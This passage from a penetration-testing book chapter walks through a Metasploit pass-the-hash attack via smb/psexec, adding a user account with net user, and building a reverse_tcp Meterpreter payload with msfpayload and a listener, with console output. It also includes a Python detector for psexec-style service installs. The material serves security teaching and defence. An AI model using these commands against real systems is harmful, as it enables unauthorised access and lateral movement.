Meterpreter

85

[*] Uploading payload...
[*] Created \JsOvAFLy.exe...

After we select the smb/psexec module and set the options for LHOST, LPORT, and RHOST, we set the SMBPass variable and input the hash that we dumped earlier. As you can see, authentication is successful and we gain our Meterpreter session. We didn't have to crack a password, and no password was needed. We've secured Administrator privileges using the password hash alone.

When we successfully compromise one system on a large network, in most cases that system will have the same administrator account on multiple systems. This attack would allow us to hop from one system to another without ever needing to crack the password itself.
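From the defender's side, the "Created \JsOvAFLy.exe" line in the psexec output above is what a remote service install looks like in the target's own logs. The following Python, added here and not taken from the book, flags service-install records that show that pattern (a random eight-letter binary name, or a binary run from an administrative share); it assumes a simplified form of the Windows System log's Event ID 7045 record, with constructed sample entries.

```python
import re

# Constructed sample records modelled on the Windows System log event
# "a service was installed" (Event ID 7045); field names are this example's own.
SAMPLE_EVENTS = [
    {"event_id": 7045, "host": "XPHOST", "service_name": "JsOvAFLy",
     "image_path": r"\\127.0.0.1\ADMIN$\JsOvAFLy.exe"},
    {"event_id": 7045, "host": "XPHOST", "service_name": "Spooler",
     "image_path": r"%SystemRoot%\system32\spoolsv.exe"},
    {"event_id": 7045, "host": "XPHOST", "service_name": "MyBackupAgent",
     "image_path": r"C:\Program Files\Backup\agent.exe"},
    {"event_id": 7036, "host": "XPHOST", "service_name": "JsOvAFLy", "image_path": ""},
]
EIGHT_LETTERS = re.compile(r"^[A-Za-z]{8}$")
ADMIN_SHARE = re.compile(r"^\\\\[^\\]+\\(ADMIN|[A-Za-z])\$\\", re.IGNORECASE)

def case_changes(name: str) -> int:
    """Count upper/lower transitions between adjacent characters."""
    return sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())

def looks_random(stem: str) -> bool:
    """Eight letters with heavily mixed case, like JsOvAFLy in the listing above."""
    return bool(EIGHT_LETTERS.match(stem)) and case_changes(stem) >= 3

def service_install_reasons(event: dict) -> list:
    """Return the reasons a 7045 record resembles a psexec-style service drop."""
    if event.get("event_id") != 7045:
        return []
    reasons = []
    path = event.get("image_path", "")
    filename = path.rsplit("\\", 1)[-1]
    stem, _, ext = filename.rpartition(".")
    if ext.lower() == "exe" and looks_random(stem):
        reasons.append("random 8-letter service binary name")
    if ADMIN_SHARE.match(path):
        reasons.append("service binary launched from an administrative share")
    if looks_random(event.get("service_name", "")):
        reasons.append("random 8-letter service name")
    return reasons

def find_suspicious(events: list) -> list:
    """Return (host, service_name, reasons) for every record that triggers."""
    return [(ev["host"], ev["service_name"], service_install_reasons(ev))
            for ev in events if service_install_reasons(ev)]
```

A legitimate installer can also produce a 7045 record, so the reasons are meant to be reviewed alongside the logon events from the same time window rather than treated as a verdict on their own.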

Privilege Escalation

Now that we have access to the system, we can create a normal user account with limited permissions using the net user command. We'll create a new user account to demonstrate how to elevate permissions as that user. (You will learn more about this in Chapter 8.)

When we compromise a limited user account, we will run into restrictions that prevent us from executing commands that require administrative-level permissions. By elevating an account's permissions, we overcome that restriction.

On a Windows XP target machine, we enter the following command:

C:\Documents and Settings\Administrator> net user bob password123 /add

Next, we create a Meterpreter-based payload, payload.exe, copy it to the target's XP machine, and run it under the user account bob. This will be our new limited user account. In this example, we will use msfpayload to create a Meterpreter-based payload as a normal Windows executable. (We'll discuss msfpayload in more detail in Chapter 7.)

root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.33.129 LPORT=443 X > payload.exe
root@bt:/opt/framework3/msf3# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.33.129 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.33.129:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1056)
meterpreter > getuid
Server username: IHAZSECURITY\bob